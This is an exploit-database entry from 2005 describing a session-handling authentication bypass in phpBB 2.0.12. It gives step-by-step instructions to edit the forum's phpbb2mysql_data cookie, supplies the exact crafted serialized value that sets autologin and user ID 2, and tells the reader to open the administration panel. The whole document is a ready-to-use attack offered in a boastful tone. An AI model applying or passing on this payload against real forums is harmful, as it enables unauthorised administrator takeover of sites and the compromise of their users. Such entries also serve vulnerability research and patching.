phpBB 2.0.12 - Session Handling Authentication Bypass

EDB-ID:

871

Author:

Ali7

Type:

webapps

Platform:

PHP

Published:

2005-03-11

phpBB 2.0.12 Session Handling Authentication Bypass ..
 
easy to use exploit ..
 
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
 
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
 
3- Close the Browser ..
 
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example ;)
 
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
 
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
 
save the cookies.txt..
 
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! :D
 
complete the mission by clicking " Go to Administration Panel "
 
--------------------------------------------------------------------------------
 
written by : Ali7
e-mail : ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]